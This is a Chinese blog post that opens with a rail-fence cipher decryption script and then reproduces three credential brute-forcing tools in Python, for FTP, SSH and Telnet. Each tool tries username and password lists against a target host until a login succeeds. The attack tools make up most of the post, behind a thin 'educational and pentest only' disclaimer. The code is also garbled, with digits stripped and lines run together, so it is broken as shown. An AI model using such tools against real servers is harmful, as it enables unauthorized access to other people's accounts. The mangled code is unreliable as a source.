今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。
方法一(通用脚本):
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
#!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result = {x:‘‘ for x in range(b)} for i in range(elen): a = i % b; result.update({a:result[a] + e[i]}) d = ‘‘ for i in range(b): d = d + result[i] print ‘分为\t‘+str(f)+‘\t‘+‘栏时,解密结果为: ‘+d |
方法二:
FTP暴力破解脚本
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
|
#!/usr/bin/env python#-*-coding = utf--*-#author:@xfk#blog:@blog.sina.com.cn/kaiyongdeng#date:@--import sys, os, timefrom ftplib import FTPdocs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ftp_bf.py [*] Coder : [*] Version : . [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt """if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear'else: clearing = 'cls'os.system(clearing)R = "\[m";G = "\[m";Y = "\[m"END = "\[m"def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | // ftp_bf.py v.. |" print " | FTP Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.strftime("%X") print docs+ENDdef help(): print R+"[*]-t, --target ip/hostname <> Our target" print "[*]-u, --usernamelist usernamelist <> usernamelist path" print "[*]-p, --passwordlist passwordlist <> passwordlist path" print "[*]-h, --help help <> print this help" print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()def bf_login(hostname,username,password): # sys.stdout.write("\r[!]Checking : %s " % (p)) # sys.stdout.flush() try: ftp = FTP(hostname) ftp.login(hostname,username, password) ftp.retrlines('list') ftp.quit() print Y+"\n[!] wt,wt!!! We did it ! " print "[+] Target : ",hostname, "" print "[+] User : ",username, "" print "[+] Password : ",password, ""+END return # sys.exit() except Exception, e: pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END sys.exit()def anon_login(hostname): try: print G+"\n[!] Checking for anonymous login.\n"+END ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print Y+"\n[!] wt,wt!!! Anonymous login successfuly !\n"+END ftp.quit() except Exception, e: print R+"\n[-] Anonymous login failed...\n"+END passdef main(): logo() try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-u' or arg.lower() == '--usernamelist': usernamelist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-p' or arg.lower() == '--passwordlist': passwordlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"[!] BruteForcing target ..."+END anon_login(hostname) # print "here is ok" # print hostname try: usernames = open(usernamelist, "r") user = usernames.readlines() count = while count < len(user): user[count] = user[count].strip() count += except: print R+"\n[-] Cheak your usernamelist path\n"+END sys.exit() # print "here is ok ",usernamelist,passwordlist try: passwords = open(passwordlist, "r") pwd = passwords.readlines() count = while count < len(pwd): pwd[count] = pwd[count].strip() count += except: print R+"\n[-] Check your passwordlist path\n"+END sys.exit() print G+"\n[+] Loaded:",len(user),"usernames" print "\n[+] Loaded:",len(pwd),"passwords" print "[+] Target:",hostname print "[+] Guessing...\n"+END for u in user: for p in pwd: result = bf_login(hostname,u.replace("\n",""),p.replace("\n","")) if result != : print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END else: print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END if not result : print R+"\n[-]There is no username ans password enabled in the list." print "[-]Exiting...\n"+ENDif __name__ == "__main__": main() |
SSH暴力破解
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
|
#!/usr/bin/env python#-*-coding = UTF--*-#author@:dengyongkai#blog@:blog.sina.com.cn/kaiyongdengimport sysimport osimport time#from threading import Threadtry: from paramiko import SSHClient from paramiko import AutoAddPolicyexcept ImportError: print G+''' You need paramiko module.http://www.lag.net/paramiko/ Debian/Ubuntu: sudo apt-get install aptitude : sudo aptitude install python-paramiko\n'''+END sys.exit()docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ssh_bf.py [*] Author : xfk [*] Version : v.. [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] """if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear'else: clearing = 'cls'os.system(clearing)R = "\[m";G = "\[m";Y = "\[m"END = "\[m"def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | // ssh_bf.py v.. |" print " | SSH Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.ctime() print docs+ENDdef help(): print Y+" [*]-H --hostname/ip <>the target hostname or ip address" print " [*]-P --port <>the ssh service port(default is )" print " [*]-U --usernamelist <>usernames list file" print " [*]-P --passwordlist <>passwords list file" print " [*]-H --help <>show help information" print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END sys.exit()def BruteForce(hostname,port,username,password): ''' Create SSH connection to target ''' ssh = SSHClient() ssh.set_missing_host_key_policy(AutoAddPolicy()) try: ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) status = 'ok' ssh.close() except Exception, e: status = 'error' pass return statusdef makelist(file): ''' Make usernames and passwords lists ''' items = [] try: fd = open(file, 'r') except IOError: print R+'unable to read file \'%s\'' % file+END pass except Exception, e: print R+'unknown error'+END pass for line in fd.readlines(): item = line.replace('\n', '').replace('\r', '') items.append(item) fd.close() return itemsdef main(): logo() # print "hello wold" try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = str(sys.argv[int(sys.argv[:].index(arg))+]) if arg.lower() == '-p' or arg.lower() == '--port': port = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-u' or arg.lower() == '--userlist': userlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"\n[!] BruteForcing target ...\n"+END# print "here is ok"# print hostname,port,wordlist,userlist usernamelist = makelist(userlist) passwordlist = makelist(wordlist) print Y+"[*] SSH Brute Force Praparing." print "[*] %s user(s) loaded." % str(len(usernamelist)) print "[*] %s password(s) loaded." % str(len(passwordlist)) print "[*] Brute Force Is Starting......."+END try: for username in usernamelist: for password in passwordlist: print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END current = BruteForce(hostname, port, username, password) if current == 'error': print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END# pass else: print G+"\n[+] ^-^ HaHa,We Got It!!!" print "[+] username: %s" % username print "[+] password: %s\n" % password+END# sys.exit() except: print R+"\n[-] There Is Something Wrong,Pleace Cheak It." print "[-] Exitting.....\n"+END raise print Y+"[+] Done.^-^\n"+END sys.exit()if __name__ == "__main__": main() |
TELNET密码暴力破解
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
#!usr/bin/python#Telnet Brute Forcer#http://www.darkcde.com#dhydr[at]gmail[dot]comimport threading, time, random, sys, telnetlibfrom copy import copyif len(sys.argv) !=: print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" sys.exit()try: users = open(sys.argv[], "r").readlines()except(IOError): print "Error: Check your userlist path\n" sys.exit()try: words = open(sys.argv[], "r").readlines()except(IOError): print "Error: Check your wordlist path\n" sys.exit()print "\n\t dhydr[at]gmail[dot]com TelnetBruteForcer v."print "\t--------------------------------------------------\n"print "[+] Server:",sys.argv[]print "[+] Users Loaded:",len(users)print "[+] Words Loaded:",len(words),"\n"wordlist = copy(words)def reloader(): for word in wordlist: words.append(word)def getword(): lock = threading.Lock() lock.acquire() if len(words) != : value = random.sample(words, ) words.remove(value[]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words, ) users.remove(users[]) lock.release() if len(users) ==: return value[][:-], users[] else: return value[][:-], users[][:-]class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"* print "User:",user,"Password:",value tn = telnetlib.Telnet(sys.argv[]) tn.read_until("login: ") tn.write(user + "\n") if password: tn.read_until("Password: ") tn.write(value + "\n") tn.write("ls\n") tn.write("exit\n") print tn.read_all() print "\t\nLogin successful:",value, user tn.close() work.join() sys.exit() except: passfor I in range(len(words)*len(users)): work = Worker() work.start() time.sleep() |
